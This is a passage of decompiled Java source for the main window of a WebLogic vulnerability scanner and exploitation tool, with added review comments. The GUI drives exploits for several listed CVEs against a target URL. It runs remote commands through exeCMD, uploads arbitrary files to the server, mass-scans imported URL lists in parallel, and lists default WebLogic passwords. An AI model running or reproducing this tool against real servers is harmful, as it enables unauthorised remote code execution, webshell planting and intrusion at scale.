package view;

import com.intellij.uiDesigner.UIFormXmlConstants;
import java.awt.Color;
import java.awt.Component;
import java.awt.Container;
import java.awt.EventQueue;
import java.awt.Font;
import java.awt.Point;
import java.awt.Rectangle;
import java.awt.event.ActionEvent;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.util.HashSet;
import java.util.Iterator;
import java.util.Vector;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.atomic.AtomicInteger;
import javax.swing.DefaultComboBoxModel;
import javax.swing.GroupLayout;
import javax.swing.JButton;
import javax.swing.JCheckBox;
import javax.swing.JComboBox;
import javax.swing.JDesktopPane;
import javax.swing.JFileChooser;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JLayeredPane;
import javax.swing.JMenu;
import javax.swing.JMenuBar;
import javax.swing.JMenuItem;
import javax.swing.JOptionPane;
import javax.swing.JPanel;
import javax.swing.JPopupMenu;
import javax.swing.JScrollPane;
import javax.swing.JTabbedPane;
import javax.swing.JTable;
import javax.swing.JTextArea;
import javax.swing.JTextField;
import javax.swing.JTextPane;
import javax.swing.LayoutStyle;
import javax.swing.SwingWorker;
import javax.swing.border.CompoundBorder;
import javax.swing.border.EmptyBorder;
import javax.swing.border.TitledBorder;
import javax.swing.table.DefaultTableModel;
import net.miginfocom.layout.UnitValue;
import payload.BaseCheck;
import payload.BasePayload;
import payload.CONSOLE;
import payload.CVE_2014_4210;
import payload.CVE_2017_10271_10;
import payload.CVE_2017_10271_12;
import payload.CVE_2017_3506;
import payload.CVE_2018_2894;
import payload.CVE_2019_2725_10;
import payload.CVE_2019_2725_10_bypass;
import payload.CVE_2019_2725_12;
import util.Tool;

/* loaded from: input_file:view/Tools.class */
public class Tools extends JFrame {
    // Progress counter shown as "done/total" by the status worker in dispatch('b'); it is reset to a
    // fresh AtomicInteger each time a batch run starts. NOTE(review): nothing in this class
    // increments it - presumably the BaseCheck tasks do; confirm in the payload package.
    public static AtomicInteger count = new AtomicInteger(0);
    // Swing widgets. All of the component fields below are instantiated at the top of initComponents().
    private JMenuBar menuBar1;
    private JMenu menu1;
    private JMenuItem update;
    private JMenu menu2;
    private JMenuItem gywm;
    private JDesktopPane table;
    private JLabel label1;
    private JLabel label2;
    // Target URL field; read by dispatch() on every action.
    private JTextField txt_url;
    private JButton jbtn_start;
    private JButton jbtn_clearLog;
    // Selected entry is handed to Tool.getPayload(...) in dispatch().
    private JComboBox<String> jcombox_vuls;
    private JTabbedPane tabbedPane1;
    private JPanel panel1;
    private JScrollPane scrollPane1;
    private JTextPane jtxtp_info;
    private JPanel panel2;
    private JLabel label3;
    // Command and encoding selections consumed by dispatch('m'); results land in jtxt_cmd_result.
    private JComboBox<String> jcombox_cmd;
    private JButton jbtn_execmd;
    private JScrollPane scrollPane3;
    private JTextArea jtxt_cmd_result;
    private JComboBox<String> jcombox_encoding;
    private JPanel panel3;
    private JLabel label4;
    // File path, file content and the "use user path" flag consumed by dispatch('u').
    private JTextField jtxt_filepath;
    private JButton jbtn_uploadFile;
    private JScrollPane scrollPane4;
    private JTextPane jtxt_fileContent;
    private JCheckBox jcheckBox_use_user_path;
    private JPanel panel4;
    private JLabel label5;
    // Selected value is parsed as the fixed thread-pool size for a batch run.
    private JComboBox<String> j_combox_threadSize;
    private JLabel label6;
    private JTextField jtxt_batch_chek_path;
    private JButton jbtn_batch_check_import;
    private JButton jbtn_batch_check_start;
    private JButton jbtn_batch_check_stop;
    private JLabel label7;
    private JLabel label8;
    private JLabel jlable_useTime;
    private JLabel jlabel_check_status;
    private JScrollPane scrollPane5;
    // Batch results table; each BaseCheck task is given a reference to it.
    private JTable jtable_batch_check_result;
    private JScrollPane scrollPane2;
    // Log area written by log(String) and cleared by the clear-log button.
    private JTextArea jtxt_log;
    private JButton jbtn_qun_start;
    private JPopupMenu jPopupMenu1;
    private JMenuItem jmenu_c_export;
    private JMenuItem jmenu_c_del_select_rows;
    // URLs for batch checking; replaced wholesale by Tool.read(...) when a list file is imported.
    private HashSet<String> list_check = new HashSet<>();
    // Executor for batch tasks; created per batch start, shutdownNow() on stop. Null until first run.
    private ExecutorService es = null;
    // Label the status worker writes progress to; pointed at jlabel_check_status in dispatch('b').
    private JLabel status_lable = null;
    // Background workers for the batch run. NOTE(review): in the decompiled dispatch('b') both workers
    // are assigned to batch_startWork and batch_statusWork is never assigned - see that method.
    private SwingWorker batch_startWork = null;
    private SwingWorker batch_statusWork = null;

    /* JADX INFO: Access modifiers changed from: private */
    /**
     * Appends one entry to the log text area.
     *
     * <p>An entry is the given text, the separator {@code "--"}, the value returned by
     * {@code Tool.getDate()}, and a CRLF line ending.
     *
     * @param str text to record
     */
    public void log(String str) {
        final String entry = str + "--" + Tool.getDate() + "\r\n";
        this.jtxt_log.append(entry);
    }

    /** Creates the frame and builds its widget tree by calling {@code initComponents()}. */
    public Tools() {
        super();
        this.initComponents();
    }

    /**
     * Shows a message dialog carrying the author's contact note for suggestions.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void menuItem1ActionPerformed(ActionEvent actionEvent) {
        final String contactNote = "有建议可以添加唐小风vx：tangxiaofeng7";
        JOptionPane.showMessageDialog(null, contactNote);
    }

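    /**
     * Handles the single-target check button by running {@code dispatch('c')}.
     *
     * <p>The button is disabled for the duration of the call. It is re-enabled in a
     * {@code finally} block: {@code dispatch} normalises the URL before entering its own
     * try/catch, so an exception can escape it, and without the {@code finally} the button
     * would stay disabled.
     *
     * <p>NOTE(review): {@code dispatch} runs synchronously on the calling thread (presumably the
     * event dispatch thread), so the window does not repaint until it returns.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jbtn_startActionPerformed(ActionEvent actionEvent) {
        this.jbtn_start.setEnabled(false);
        try {
            dispatch('c');
        } finally {
            this.jbtn_start.setEnabled(true);
        }
    }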

    /**
     * Central action router for the UI. The mode character selects what is done with the URL
     * currently in {@code txt_url} and the entry selected in {@code jcombox_vuls}.
     *
     * <ul>
     *   <li>{@code 'a'} - log which of the nine built-in checks reported a hit.</li>
     *   <li>{@code 'b'} - queue one {@code BaseCheck} per imported URL on the executor {@code es}.</li>
     *   <li>{@code 'c'} - run only the selected payload's {@code checkVUL} and show the result.</li>
     *   <li>{@code 'm'} - pass the command and encoding combo values to the payload's {@code exeCMD}.</li>
     *   <li>{@code 'u'} - pass the file content and path fields to the payload's {@code uploadFile}.</li>
     * </ul>
     *
     * <p>Any {@link Exception} raised inside the try block is reduced to one log line.
     *
     * @param c mode selector; the switch has no default, so any other value runs the pre-switch
     *          checks and then does nothing
     */
    private void dispatch(char c) {
        // NOTE(review): this call sits outside the try block, so an exception from it propagates
        // to the button handler instead of being logged.
        String checkTheURL = Tool.checkTheURL(this.txt_url.getText());
        try {
            // getSelectedItem() is dereferenced without a null check; an empty selection would
            // surface as a logged NullPointerException via the catch below.
            final BasePayload payload2 = Tool.getPayload(this.jcombox_vuls.getSelectedItem().toString());
            CONSOLE console = new CONSOLE();
            CVE_2014_4210 cve_2014_4210 = new CVE_2014_4210();
            CVE_2018_2894 cve_2018_2894 = new CVE_2018_2894();
            CVE_2017_3506 cve_2017_3506 = new CVE_2017_3506();
            CVE_2017_10271_10 cve_2017_10271_10 = new CVE_2017_10271_10();
            CVE_2017_10271_12 cve_2017_10271_12 = new CVE_2017_10271_12();
            CVE_2019_2725_10 cve_2019_2725_10 = new CVE_2019_2725_10();
            CVE_2019_2725_12 cve_2019_2725_12 = new CVE_2019_2725_12();
            CVE_2019_2725_10_bypass cVE_2019_2725_10_bypass = new CVE_2019_2725_10_bypass();
            // All nine checks run here, before the switch, on every call and for every mode;
            // only case 'a' reads the results. NOTE(review): presumably each checkVUL contacts the
            // target (confirm in the payload package) - if so, any single UI action produces the
            // complete set of probes against the URL, which is what a server-side log would show.
            boolean checkVUL = console.checkVUL(checkTheURL);
            boolean checkVUL2 = cve_2014_4210.checkVUL(checkTheURL);
            boolean checkVUL3 = cve_2018_2894.checkVUL(checkTheURL);
            boolean checkVUL4 = cve_2017_3506.checkVUL(checkTheURL);
            boolean checkVUL5 = cve_2017_10271_10.checkVUL(checkTheURL);
            boolean checkVUL6 = cve_2017_10271_12.checkVUL(checkTheURL);
            boolean checkVUL7 = cve_2019_2725_10.checkVUL(checkTheURL);
            boolean checkVUL8 = cve_2019_2725_12.checkVUL(checkTheURL);
            boolean checkVUL9 = cVE_2019_2725_10_bypass.checkVUL(checkTheURL);
            switch (c) {
                case 'a':
                    // Report mode: one log line per check that returned true.
                    if (checkVUL) {
                        log(checkTheURL + " 存在weblogic administrator 控制台路径泄漏漏洞!");
                    }
                    if (checkVUL2) {
                        log(checkTheURL + " 存在CVE-2014-4210 Weblogic SSRF漏洞");
                    }
                    if (checkVUL3) {
                        log(checkTheURL + " 存在CVE-2018-2894 任意文件上传漏洞");
                    }
                    if (checkVUL4) {
                        log(checkTheURL + " CVE-2017-3506 XMLDecoder 反序列化漏洞!");
                    }
                    if (checkVUL5) {
                        log(checkTheURL + " 存在CVE-2017-10271 XMLDecoder反序列化漏洞（1）！");
                    }
                    if (checkVUL6) {
                        log(checkTheURL + " 存在CVE-2017-10271 XMLDecoder反序列化漏洞（2）！");
                    }
                    if (checkVUL7) {
                        log(checkTheURL + " 存在CVE-2019-2725 wls9-async反序列化漏洞（1）！");
                    }
                    if (checkVUL8) {
                        log(checkTheURL + " 存在CVE-2019-2725 wls9-async反序列化漏洞（2）！");
                    }
                    // NOTE(review): the "nothing found" line is keyed on the ninth check alone, so
                    // it is logged even when one of the eight checks above already reported a hit.
                    if (!checkVUL9) {
                        log(checkTheURL + " 没有发现漏洞！");
                        break;
                    } else {
                        log(checkTheURL + " 存在CVE-2019-2725 wls9-async反序列化漏洞（3）！");
                        break;
                    }
                case 'b':
                    // Batch mode: the caller has already created the executor in this.es.
                    this.status_lable = this.jlabel_check_status;
                    // Posts a Runnable with an empty body; it has no effect as decompiled.
                    EventQueue.invokeLater(new Runnable() { // from class: view.Tools.1
                        @Override // java.lang.Runnable
                        public void run() {
                        }
                    });
                    // Producer worker: submits one BaseCheck per URL, then waits for the pool to drain.
                    this.batch_startWork = new SwingWorker<Void, Void>() { // from class: view.Tools.2
                        /* JADX INFO: Access modifiers changed from: protected */
                        /* renamed from: doInBackground, reason: merged with bridge method [inline-methods] */
                        // NOTE(review): JADX renamed this method; SwingWorker's hook is
                        // doInBackground(), so as decompiled this name does not override it.
                        public Void m24doInBackground() throws Exception {
                            int i = 0;
                            Iterator it = Tools.this.list_check.iterator();
                            while (it.hasNext()) {
                                String str = (String) it.next();
                                BaseCheck baseCheck = new BaseCheck();
                                baseCheck.table = Tools.this.jtable_batch_check_result;
                                // index is 1-based: incremented before it is assigned.
                                i++;
                                baseCheck.index = i;
                                baseCheck.url = str;
                                baseCheck.init(payload2);
                                Tools.this.es.execute(baseCheck);
                            }
                            // No new tasks after this point; poll every 200 ms until all have finished.
                            Tools.this.es.shutdown();
                            while (!Tools.this.es.isTerminated()) {
                                Thread.sleep(200L);
                            }
                            Tools.this.log("批量完成");
                            return null;
                        }

                        // Re-enables the start button and cancels the status worker if one is set.
                        protected void done() {
                            Tools.this.jbtn_batch_check_start.setEnabled(true);
                            if (Tools.this.batch_statusWork != null) {
                                Tools.this.batch_statusWork.cancel(true);
                            }
                        }
                    };
                    this.batch_startWork.execute();
                    // NOTE(review): the status worker below is assigned to batch_startWork again,
                    // overwriting the producer reference, while the execute() call after it uses
                    // batch_statusWork. No assignment to batch_statusWork is visible in this file
                    // view, so that call would dereference null on first use and end up in the
                    // catch below. Possibly a decompiler artifact - confirm against the bytecode.
                    this.batch_startWork = new SwingWorker<Void, Void>() { // from class: view.Tools.3
                        /* JADX INFO: Access modifiers changed from: protected */
                        /* renamed from: doInBackground, reason: merged with bridge method [inline-methods] */
                        public Void m25doInBackground() throws Exception {
                            int i = 0;
                            // Once per second: write "count/total" and the elapsed loop count to the
                            // labels. The loop has no exit condition; it ends only when the sleep is
                            // interrupted (cancel(true)). The labels are updated from this worker
                            // thread rather than the event dispatch thread.
                            while (true) {
                                Tools.this.status_lable.setText(Tools.count.get() + "/" + Tools.this.list_check.size());
                                Tools.this.jlable_useTime.setText(i + "");
                                Thread.sleep(1000L);
                                i++;
                            }
                        }
                    };
                    this.batch_statusWork.execute();
                    break;
                case 'c':
                    // Single check with the selected payload. Dialog type 1 is
                    // JOptionPane.INFORMATION_MESSAGE, type 0 is JOptionPane.ERROR_MESSAGE.
                    if (!payload2.checkVUL(checkTheURL)) {
                        log(checkTheURL + "不存在漏洞！");
                        JOptionPane.showMessageDialog((Component) null, "不存在漏洞", "漏洞验证结果", 1);
                        break;
                    } else {
                        log(checkTheURL + "存在漏洞！");
                        // Logs the path returned by getWebPath with backslashes turned into slashes.
                        log("当前应用目录：" + payload2.getWebPath(checkTheURL).replace("\\", "/"));
                        JOptionPane.showMessageDialog((Component) null, "存在漏洞", "漏洞验证结果", 0);
                        break;
                    }
                case 'm':
                    // Command mode: the text returned by exeCMD replaces the result area's content.
                    this.jtxt_cmd_result.setText(payload2.exeCMD(checkTheURL, this.jcombox_cmd.getSelectedItem().toString(), this.jcombox_encoding.getSelectedItem().toString()));
                    break;
                case 'u':
                    // Upload mode: an empty return string is treated as failure, anything else as
                    // the resulting address. The success message itself asks the operator to verify.
                    String uploadFile = payload2.uploadFile(checkTheURL, this.jtxt_fileContent.getText(), this.jtxt_filepath.getText(), this.jcheckBox_use_user_path.isSelected());
                    if (!"".equals(uploadFile)) {
                        log(checkTheURL + "上传完成！，请核查是否成功，地址：" + uploadFile);
                        JOptionPane.showMessageDialog((Component) null, "上传完成！", "上传结果", 1);
                        break;
                    } else {
                        log(checkTheURL + "上传失败！");
                        JOptionPane.showMessageDialog((Component) null, "上传失败！", "上传结果", 1);
                        break;
                    }
            }
        } catch (Exception e) {
            // Every failure above collapses to its toString() in the log; no stack trace is kept.
            log(e.toString());
        }
    }

    /**
     * Handles the clear-log button by emptying the log text area.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jbtn_clearLogActionPerformed(ActionEvent actionEvent) {
        final String empty = "";
        this.jtxt_log.setText(empty);
    }

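    /**
     * Handles the upload button by running {@code dispatch('u')}.
     *
     * <p>The button is disabled for the duration of the call. It is re-enabled in a
     * {@code finally} block: {@code dispatch} normalises the URL before entering its own
     * try/catch, so an exception can escape it, and without the {@code finally} the button
     * would stay disabled.
     *
     * <p>NOTE(review): {@code dispatch} runs synchronously on the calling thread (presumably the
     * event dispatch thread), so the window does not repaint until it returns.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jbtn_uploadFileActionPerformed(ActionEvent actionEvent) {
        this.jbtn_uploadFile.setEnabled(false);
        try {
            dispatch('u');
        } finally {
            this.jbtn_uploadFile.setEnabled(true);
        }
    }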

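    /**
     * Handles the execute button by running {@code dispatch('m')}.
     *
     * <p>The button is disabled for the duration of the call. It is re-enabled in a
     * {@code finally} block: {@code dispatch} normalises the URL before entering its own
     * try/catch, so an exception can escape it, and without the {@code finally} the button
     * would stay disabled.
     *
     * <p>NOTE(review): {@code dispatch} runs synchronously on the calling thread (presumably the
     * event dispatch thread), so the window does not repaint until it returns.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jbtn_execmdActionPerformed(ActionEvent actionEvent) {
        this.jbtn_execmd.setEnabled(false);
        try {
            dispatch('m');
        } finally {
            this.jbtn_execmd.setEnabled(true);
        }
    }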

    /**
     * Handles the batch-start button.
     *
     * <p>Disables the button and replaces the shared progress counter with a fresh one. When no
     * URLs have been imported it shows a warning and re-enables the button. Otherwise it parses
     * the selected thread count, empties the result table, creates a fixed-size pool in
     * {@code es} and runs {@code dispatch('b')}; on that path the button is not re-enabled here.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jbtn_batch_check_startActionPerformed(ActionEvent actionEvent) {
        this.jbtn_batch_check_start.setEnabled(false);
        count = new AtomicInteger(0);

        if (this.list_check.isEmpty()) {
            JOptionPane.showMessageDialog(null, "请先导入检查URL！", "URL批量检查", JOptionPane.WARNING_MESSAGE);
            this.jbtn_batch_check_start.setEnabled(true);
            return;
        }

        final String selectedSize = this.j_combox_threadSize.getSelectedItem().toString();
        final int poolSize = Integer.parseInt(selectedSize);
        // getModel() is declared as TableModel; the decompiler dropped the cast that setRowCount needs.
        ((DefaultTableModel) this.jtable_batch_check_result.getModel()).setRowCount(0);
        this.es = Executors.newFixedThreadPool(poolSize);
        dispatch('b');
    }

    /**
     * Handles the import button: lets the user pick a file and loads it as the batch URL list.
     *
     * <p>The dialog's return code is not inspected; only a {@code null} selection is treated as
     * "nothing chosen". For a chosen file, its absolute path is shown in the path field,
     * {@code list_check} is replaced with the result of {@code Tool.read(path, "UTF-8")}, and a
     * dialog reports how many entries were loaded.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jbtn_batch_check_importActionPerformed(ActionEvent actionEvent) {
        final JFileChooser chooser = new JFileChooser();
        chooser.setFileSelectionMode(JFileChooser.FILES_ONLY);
        chooser.showDialog(new JLabel(), "选择");

        final File chosen = chooser.getSelectedFile();
        if (chosen == null) {
            return;
        }

        final String absolutePath = chosen.getAbsolutePath();
        this.jtxt_batch_chek_path.setText(absolutePath);
        this.list_check = Tool.read(absolutePath, "UTF-8");
        final String summary = "导入了" + this.list_check.size() + "个URL！";
        JOptionPane.showMessageDialog(null, summary, "导入URL", JOptionPane.INFORMATION_MESSAGE);
    }

    /**
     * Handles the batch-stop button.
     *
     * <p>Does nothing when no executor has been created yet. Otherwise calls
     * {@code shutdownNow()} on it, cancels whichever of the two batch workers are set, and logs
     * that the threads were stopped.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jbtn_batch_check_stopActionPerformed(ActionEvent actionEvent) {
        if (this.es == null) {
            return;
        }
        this.es.shutdownNow();
        final SwingWorker producer = this.batch_startWork;
        if (producer != null) {
            producer.cancel(true);
        }
        final SwingWorker status = this.batch_statusWork;
        if (status != null) {
            status.cancel(true);
        }
        log("线程已经停止！");
    }

    /* JADX INFO: Access modifiers changed from: private */
    /**
     * Mouse-click hook for the batch-result scroll pane; it has no behaviour.
     *
     * @param mouseEvent the click event (unused)
     */
    public void scrollPane5MouseClicked(MouseEvent mouseEvent) {
        // Intentionally empty.
    }

    /* JADX INFO: Access modifiers changed from: private */
    /**
     * Opens the context menu when the batch-result table is clicked with button 3 over a row.
     *
     * <p>Clicks with any other button, or outside every row, are ignored.
     *
     * @param mouseEvent the click event; supplies the button and the popup position
     */
    public void jtable_batch_check_resultMouseClicked(MouseEvent mouseEvent) {
        final boolean isButton3 = mouseEvent.getButton() == MouseEvent.BUTTON3;
        // The row lookup only runs for button-3 clicks, as in the short-circuit it replaces.
        if (isButton3 && this.jtable_batch_check_result.rowAtPoint(mouseEvent.getPoint()) != -1) {
            final int x = mouseEvent.getX();
            final int y = mouseEvent.getY();
            this.jPopupMenu1.show(this.jtable_batch_check_result, x, y);
        }
    }

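    /**
     * Exports the batch-result table to a file chosen in a save dialog.
     *
     * <p>For each row, the value in column index 2 is converted to text, its final character is
     * dropped, and the remainder is written as one line in UTF-8. Nothing is written when the
     * dialog is not approved.
     *
     * <p>The decompiled original repeated its stream cleanup three times, returned early from the
     * cleanup when closing the buffered writer failed (leaving the underlying writer unclosed),
     * and closed the writer in places where the {@link java.io.IOException} was not handled.
     * try-with-resources closes every stream on every path. A failure while closing is now
     * logged with the same prefix as any other save failure.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jmenu_c_exportActionPerformed(ActionEvent actionEvent) {
        JFileChooser jFileChooser = new JFileChooser();
        jFileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY);
        if (jFileChooser.showSaveDialog(null) != JFileChooser.APPROVE_OPTION) {
            return;
        }
        // Declared separately so each stream is closed even if wrapping it in the next one fails.
        try (FileOutputStream fileOutputStream = new FileOutputStream(jFileChooser.getSelectedFile());
                OutputStreamWriter outputStreamWriter = new OutputStreamWriter(fileOutputStream, "UTF-8");
                BufferedWriter bufferedWriter = new BufferedWriter(outputStreamWriter)) {
            // getModel() is declared as TableModel; getDataVector() needs the concrete model type.
            DefaultTableModel model = (DefaultTableModel) this.jtable_batch_check_result.getModel();
            for (Object rowObject : model.getDataVector()) {
                Vector<?> row = (Vector<?>) rowObject;
                // String.valueOf mirrors StringBuffer.append(Object): a null cell becomes "null".
                String cell = String.valueOf(row.get(2));
                // Drops the last character, as the original did. NOTE(review): presumably the
                // stored value ends in a separator - confirm against the code that fills the table.
                String line = cell.isEmpty() ? cell : cell.substring(0, cell.length() - 1);
                bufferedWriter.write(line);
                bufferedWriter.newLine();
            }
        } catch (Exception e) {
            log("保存异常！" + e.getMessage());
        }
    }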

    /**
     * Deletes the rows currently selected in the batch-result table.
     *
     * <p>With no selection a warning dialog is shown and nothing is removed. Otherwise the row
     * reported by {@code getSelectedRow()} is removed once per originally selected row, and a
     * confirmation dialog follows.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jmenu_c_del_select_rowsActionPerformed(ActionEvent actionEvent) {
        final JTable resultTable = this.jtable_batch_check_result;
        final int selectedCount = resultTable.getSelectedRows().length;
        if (selectedCount <= 0) {
            JOptionPane.showMessageDialog(null, "未选中需要删除的数据！", "删除选中行", JOptionPane.WARNING_MESSAGE);
            return;
        }

        // getModel() is declared as TableModel; the decompiler dropped the cast this assignment needs.
        final DefaultTableModel tableModel = (DefaultTableModel) resultTable.getModel();
        int remaining = selectedCount;
        while (remaining > 0) {
            // The selection is re-queried on every pass rather than indexing the initial snapshot.
            tableModel.removeRow(resultTable.getSelectedRow());
            remaining--;
        }
        JOptionPane.showMessageDialog(null, "删除成功！", "删除选中行", JOptionPane.INFORMATION_MESSAGE);
    }

    /**
     * Export menu hook; it has no behaviour.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jmenu_exportActionPerformed(ActionEvent actionEvent) {
        // Intentionally empty.
    }

    /**
     * Handles the "upgrade" menu item by showing the author's contact note in a message dialog.
     * No update check or download is performed here.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void updateActionPerformed(ActionEvent actionEvent) {
        final String contactNote = "联系vx:tangxiaofeng7，贡献exp";
        JOptionPane.showMessageDialog(null, contactNote);
    }

    /**
     * Handles the "about" menu item by showing the lab's follow-us note in a message dialog.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void gywmActionPerformed(ActionEvent actionEvent) {
        final String aboutNote = "关注公众号《雷石安全实验室》";
        JOptionPane.showMessageDialog(null, aboutNote);
    }

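    /**
     * Handles the check-all button by running {@code dispatch('a')}.
     *
     * <p>The button is disabled for the duration of the call. It is re-enabled in a
     * {@code finally} block: {@code dispatch} normalises the URL before entering its own
     * try/catch, so an exception can escape it, and without the {@code finally} the button
     * would stay disabled.
     *
     * <p>NOTE(review): {@code dispatch} runs synchronously on the calling thread (presumably the
     * event dispatch thread), so the window does not repaint until it returns.
     *
     * @param actionEvent the triggering event (unused)
     */
    private void jbtn_qun_startActionPerformed(ActionEvent actionEvent) {
        this.jbtn_qun_start.setEnabled(false);
        try {
            dispatch('a');
        } finally {
            this.jbtn_qun_start.setEnabled(true);
        }
    }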

    /* JADX WARN: Type inference failed for: r4v102, types: [java.lang.Object[], java.lang.Object[][]] */
    private void initComponents() {
        this.menuBar1 = new JMenuBar();
        this.menu1 = new JMenu();
        this.update = new JMenuItem();
        this.menu2 = new JMenu();
        this.gywm = new JMenuItem();
        this.table = new JDesktopPane();
        this.label1 = new JLabel();
        this.label2 = new JLabel();
        this.txt_url = new JTextField();
        this.jbtn_start = new JButton();
        this.jbtn_clearLog = new JButton();
        this.jcombox_vuls = new JComboBox<>();
        this.tabbedPane1 = new JTabbedPane();
        this.panel1 = new JPanel();
        this.scrollPane1 = new JScrollPane();
        this.jtxtp_info = new JTextPane();
        this.panel2 = new JPanel();
        this.label3 = new JLabel();
        this.jcombox_cmd = new JComboBox<>();
        this.jbtn_execmd = new JButton();
        this.scrollPane3 = new JScrollPane();
        this.jtxt_cmd_result = new JTextArea();
        this.jcombox_encoding = new JComboBox<>();
        this.panel3 = new JPanel();
        this.label4 = new JLabel();
        this.jtxt_filepath = new JTextField();
        this.jbtn_uploadFile = new JButton();
        this.scrollPane4 = new JScrollPane();
        this.jtxt_fileContent = new JTextPane();
        this.jcheckBox_use_user_path = new JCheckBox();
        this.panel4 = new JPanel();
        this.label5 = new JLabel();
        this.j_combox_threadSize = new JComboBox<>();
        this.label6 = new JLabel();
        this.jtxt_batch_chek_path = new JTextField();
        this.jbtn_batch_check_import = new JButton();
        this.jbtn_batch_check_start = new JButton();
        this.jbtn_batch_check_stop = new JButton();
        this.label7 = new JLabel();
        this.label8 = new JLabel();
        this.jlable_useTime = new JLabel();
        this.jlabel_check_status = new JLabel();
        this.scrollPane5 = new JScrollPane();
        this.jtable_batch_check_result = new JTable();
        this.scrollPane2 = new JScrollPane();
        this.jtxt_log = new JTextArea();
        this.jbtn_qun_start = new JButton();
        this.jPopupMenu1 = new JPopupMenu();
        this.jmenu_c_export = new JMenuItem();
        this.jmenu_c_del_select_rows = new JMenuItem();
        setTitle("Weblogic漏洞扫描工具-雷石安全实验室");
        setDefaultCloseOperation(3);
        setResizable(false);
        Container contentPane = getContentPane();
        this.menu1.setText("工具");
        this.update.setText("升级版本");
        this.update.addActionListener(actionEvent -> {
            updateActionPerformed(actionEvent);
        });
        this.menu1.add(this.update);
        this.menuBar1.add(this.menu1);
        this.menu2.setText("关于我们");
        this.gywm.setText("实验室");
        this.gywm.addActionListener(actionEvent2 -> {
            gywmActionPerformed(actionEvent2);
        });
        this.menu2.add(this.gywm);
        this.menuBar1.add(this.menu2);
        setJMenuBar(this.menuBar1);
        this.table.setBackground(new Color(153, 153, 153));
        this.label1.setText("选择漏洞：");
        this.label1.setBackground(Color.black);
        this.table.add(this.label1, JLayeredPane.DEFAULT_LAYER);
        this.label1.setBounds(10, 25, 80, this.label1.getPreferredSize().height);
        this.label2.setText("地址：");
        this.table.add(this.label2, JLayeredPane.DEFAULT_LAYER);
        this.label2.setBounds(550, 25, 45, this.label2.getPreferredSize().height);
        this.txt_url.setText("http://127.0.0.1:7001/");
        this.table.add(this.txt_url, JLayeredPane.DEFAULT_LAYER);
        this.txt_url.setBounds(600, 20, 295, this.txt_url.getPreferredSize().height);
        this.jbtn_start.setText("检 测");
        this.jbtn_start.addActionListener(actionEvent3 -> {
            jbtn_startActionPerformed(actionEvent3);
        });
        this.table.add(this.jbtn_start, JLayeredPane.DEFAULT_LAYER);
        this.jbtn_start.setBounds(new Rectangle(new Point(930, 20), this.jbtn_start.getPreferredSize()));
        this.jbtn_clearLog.setText("清空日志");
        this.jbtn_clearLog.addActionListener(actionEvent4 -> {
            jbtn_clearLogActionPerformed(actionEvent4);
        });
        this.table.add(this.jbtn_clearLog, JLayeredPane.DEFAULT_LAYER);
        this.jbtn_clearLog.setBounds(new Rectangle(new Point(1140, 20), this.jbtn_clearLog.getPreferredSize()));
        this.jcombox_vuls.setModel(new DefaultComboBoxModel(new String[]{"Weblogic Aministrator 控制台路径泄露漏洞", "CVE-2014-4210 Weblogic SSRF漏洞", "CVE-2017-3506 XMLDecoder 反序列化漏洞", "CVE-2018-2894 任意文件上传漏洞", "CVE-2017-10271 XMLDecoder反序列化漏洞（1）", "CVE-2017-10271 XMLDecoder反序列化漏洞（2）", "CVE-2019-2725 wls9-async反序列化漏洞（1）", "CVE-2019-2725 wls9-async反序列化漏洞（2）", "CVE-2019-2725 wls9-async反序列化漏洞（3）"}));
        this.table.add(this.jcombox_vuls, JLayeredPane.DEFAULT_LAYER);
        this.jcombox_vuls.setBounds(70, 20, 475, this.jcombox_vuls.getPreferredSize().height);
        this.panel1.setBorder(new CompoundBorder(new TitledBorder(new EmptyBorder(0, 0, 0, 0), "JFormDesigner Evaluation", 2, 5, new Font("Dialog", 1, 12), Color.red), this.panel1.getBorder()));
        this.panel1.addPropertyChangeListener(new PropertyChangeListener() { // from class: view.Tools.4
            @Override // java.beans.PropertyChangeListener
            public void propertyChange(PropertyChangeEvent propertyChangeEvent) {
                if (UIFormXmlConstants.ELEMENT_BORDER.equals(propertyChangeEvent.getPropertyName())) {
                    throw new RuntimeException();
                }
            }
        });
        this.jtxtp_info.setText("V2.0\n\n增加批量检测漏洞功能\n\n去除登陆密码框\n\nV1.0\n\nweblogic administrator 控制台路径泄漏漏洞\n弱口令\nWebLogic, weblogic, Oracle@123, password, system, Administrator, admin\n\n\nCVE-2014-4210 Weblogic SSRF漏洞: \n影响版本 : 10.0.2，10.3.6 \nhttp://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp\n\n\nCVE-2017-3506&CVE-2017-10271 XMLDecoder 反序列化漏洞:\n影响版本 : 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n\nCVE-2018-2894 任意文件上传\n影响版本：10.3.6.0，12.1.3.0，12.2.1.2，12.2.1.3\n\n\nCVE-2019-2725 wls9-async反序列化漏洞\n影响版本：10.3.6.0, 12.1.3.0\n\n");
        this.scrollPane1.setViewportView(this.jtxtp_info);
        GroupLayout groupLayout = new GroupLayout(this.panel1);
        this.panel1.setLayout(groupLayout);
        groupLayout.setHorizontalGroup(groupLayout.createParallelGroup().addGroup(groupLayout.createSequentialGroup().addGap(16, 16, 16).addComponent(this.scrollPane1, -2, 1185, -2).addContainerGap(19, 32767)));
